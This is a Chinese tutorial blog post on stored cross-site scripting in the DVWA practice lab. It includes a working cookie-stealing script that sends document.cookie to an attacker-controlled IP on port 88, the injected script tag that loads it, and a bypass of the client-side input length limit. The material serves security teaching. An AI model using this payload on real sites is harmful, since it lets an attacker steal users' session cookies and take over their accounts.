二十五、XSS跨站攻击-(4)存储型xss
2017-12-15 本文已影响0人
cybeyond
目录
1.特点
2.存储型xss盗取cookie
1、特点
- 长期存储于服务端
- 每次用户访问都会执行javascript脚本,而反射型需要通过诱使用户去点击
在存储性跨站中,留言板Message里面输入一段js,然后点击提交,以后访问此页面的每个用户都会出现此弹出页。
输入js 存储型xss每次弹出
由于在网页Name中有字数限制,即存在Name客户端表单长度限制,因此没法直接输入js,可以通过burpsuite输入(防范的方法是不仅在客户端限制,也要在服务端限制) 输入js
点击go后,查看reponse报文,并通过“show reponse in browser”查看是否弹出xssed
在浏览器中查看响应url 点击copy 弹出xssed
2、存储型xss盗取cookie
首先在kali上写一段js脚本b.js,j将其放于/var/www/html/目录下,用于用户访问时能够被调用执行
var img = new Image();
img.src = "http://192.168.50.115:88/cookies.php?cookie="+document.cookie;
随后在kali上开启apache
#service apache2 start
测试能否访问到b.js
正常访问b.js
然后在kali上开启监听88端口
监听88端口
由于上面描述的,在dvwa的stored xss的name输入有长度限制,可以通过burpsuite,也可以通过html直接修改
找到name输入长度限制 修改长度限制为999
最后向其输入js代码
<script src=http://192.168.50.115/b.js></script>
输入js
点击提交,此时查看效果,js已经保存在服务端,其他用户点击就会将cookie发送到kali上
查看cookie1从宿主机上,当点击此页面的时候,重新启动监听后,能够得到其他用户的cookie
查看cookie2